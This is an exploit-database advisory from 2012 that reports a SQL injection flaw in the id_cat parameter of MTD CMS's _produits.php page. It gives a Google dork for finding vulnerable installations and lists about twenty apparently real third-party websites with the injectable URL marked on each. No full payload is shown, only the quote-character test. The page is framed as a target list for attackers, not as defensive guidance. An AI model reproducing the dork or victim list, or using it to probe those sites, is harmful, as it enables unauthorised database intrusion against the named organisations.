MTD CMS SQL Injection

2012.03.12

Credit: the_cyber_nuxbie

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Official Website: http://www.1337day.com 0
1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1
0 0
1 ########################################## 1
0 I'm NuxbieCyber Member From Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[ MTDCMS - SQL Injection Vulnerability ]
[x] Author : the_cyber_nuxbie
[x] Home : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found : 11 March 2012 @ 06:55 AM.
[x] Tested : Back|Track 5.
[x] Dork : inurl:"/_produits.php?id_cat=" intext:"Powered By MTD Group"
________________________________________________________________________
************************************************************************
- Info WebApps:
This Content Develop By:
Powered By MTD Group @ 2007-2011 - MTD
http://www.mediatd.com/
- Exploit Report:
http://localhost/WebApps/_produits.php?id_cat=[SQL Injection]
- Sample WebApps Vuln SQLi:
http://mtdgroup-mailserver.com/bestfactory/fr/_produits.php?id_cat=3'
+ [SQL Injection]
http://adem-tn.com/ang/_produits.php?id_cat=3' + [SQL Injection]
http://clubyogo.com/fr/_produits.php?id_cat=2' + [SQL Injection]
http://cotrag-tn.com/ang/_produits.php?id_cat=2' + [SQL Injection]
http://deyma-gift.com/ang/_produits.php?id_cat=4' + [SQL Injection]
http://domelec-tn.com/fr/_produits.php?id_cat=6' + [SQL Injection]
http://francis-crespo.com/ang/_produits.php?id_cat=5' + [SQL Injection]
http://globalevolution.com.tn/fr/_produits.php?id_cat=1' + [SQL Injection]
http://idealceram.com/ang/_produits.php?id_cat=1' + [SQL Injection]
http://kindachaussettes.com/ang/_produits.php?id_cat=2' + [SQL Injection]
http://labidiviandes.com/fr/_produits.php?id_cat=4' + [SQL Injection]
http://lifestyle-porcelanosa.com/ang/_produits.php?id_cat=4' + [SQL Injection]
http://materna-tn.com/fr/_produits.php?id_cat=8' + [SQL Injection]
http://magseeds.net/ang/_produits.php?id_cat=4' + [SQL Injection]
http://nord-industrie.com/ang/_produits.php?id_cat=5' + [SQL Injection]
http://sotumar-marbre.com/ang/_produits.php?id_cat=1' + [SQL Injection]
http://tunicom.com.tn/fr/_produits.php?id_cat=3' + [SQL Injection]
http://vitalait.net/fr/_produits.php?id_cat=3' + [SQL Injection]
http://yogo.com.tn/fr/_produits.php?id_cat=9' + [SQL Injection]
http://safitextile.com/fr/_produits.php?id_cat=4' + [SQL Injection]
, And Many More @ Google...!!!
- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...

References:

http://www.thecybernuxbie.com/

http://www.mediatd.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MTD CMS SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.